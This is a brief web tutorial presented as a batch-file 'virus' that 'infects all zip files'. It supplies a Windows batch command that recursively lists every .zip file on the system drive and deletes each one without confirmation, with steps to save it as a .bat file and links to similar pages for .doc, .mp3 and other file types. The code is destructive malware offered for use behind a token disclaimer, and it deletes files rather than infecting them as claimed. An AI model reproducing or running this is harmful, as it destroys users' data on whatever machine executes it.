BATCH PROGRAMING VIRUS - Infect all zip file

Note: This tutorial is education purpose only! This can be illegal! Use at your own risk !

DIR /S/B %SystemDrive%\*.zip >> FIleList_zip.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_zip.txt) do del "%%j:%%k"

Batch File Creation Steps

Step 1 : Open Notepad in windows operating system.
Step 2 : Write the above code.
Step 3 : save file as .bat extension.

To Learn Batch Programing Click here.

  1. Infect All .doc Files
  2. Infect All .html Files
  3. Infect All .mp3 Files
  4. Infect All .mp4 Files
  5. Infect All .mpeg Files
  6. Infect All .vlc Files
  7. Infect All .wma Files
  8. Infect All .zip Files
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